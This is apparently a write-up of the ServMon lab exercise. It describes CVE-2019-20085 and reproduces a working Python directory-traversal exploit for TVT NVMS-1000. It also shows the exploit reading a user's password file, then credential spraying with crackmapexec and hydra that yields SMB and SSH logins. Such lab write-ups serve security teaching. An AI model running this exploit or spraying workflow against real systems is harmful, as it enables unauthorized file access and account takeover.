CVE-2019-20085
a vulnerability has been found in tvt nvms-1000 (affected version unknown) and classified as critical. Affected by this vulnerability is an unknown code of the component GET Request Handler. The manipulation with the input value /.. leads to a path traversal vulnerability. The CWE definition for the vulnerability is CWE-22. The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. As an impact it is known to affect confidentiality, integrity, and availability.
exploit
# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085
import sys
import requests
import os
import time
if len(sys.argv) !=4:
print " "
print "Usage : python exploit.py url filename outputname"
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
print " "
else:
traversal = "../../../../../../../../../../../../../"
filename = sys.argv[2]
url = sys.argv[1]+traversal+filename
outputname = sys.argv[3]
content = requests.get(url)
if content.status_code == 200:
print " "
print "Directory Traversal Succeeded"
time.sleep(3)
print " "
print "Saving Output"
os.system("touch " + outputname)
output_write = open(outputname,"r+")
output_write.write(content.text)
output_write.close()
else:
print "Host not vulnerable to Directory Traversal!"The exploit was found from Searchsploit
Exploitation
Given the fact that the note from the FTP server mentions a credential file located at the desktop of the Nathan user directory, I will be able to exploit this vulnerability to extract the Passwords.txt file
this is done under the impression that the ftp server is serving the c:\Users directory
┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ python3 nvms1000_directory_traversal.py $IP Users/Nathan/Desktop/Passwords.txt passwords.txt
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++extracting the c:/Users/Nathan/Desktop/Passwords.txt to passwords.txt
It appears to be a list of passwords.
Validation
SMB
┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ crackmapexec smb $IP -u users -p passwords.txt --continue-on-success
smb 10.10.10.184 445 servmon [*] windows 10.0 build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
smb 10.10.10.184 445 servmon [-] servmon\nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [+] servmon\nadine:L1k3B1gBut7s@W0rk
smb 10.10.10.184 445 servmon [-] servmon\nadine:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nadine:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\nadine:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\administrator:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\administrator:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\administrator:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\administrator:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\administrator:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\administrator:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE
smb 10.10.10.184 445 servmon [-] servmon\administrator:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE I got one hit from running CrackMapExec against the SMB server for validation
nadine:L1k3B1gBut7s@W0rk
On top of that, I got the hostname; ServMon
SSH
┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ hydra -L users -P passwords.txt ssh://$IP
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 10:43:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21 login tries (l:3/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 10:43:58The same credential works for SSH as well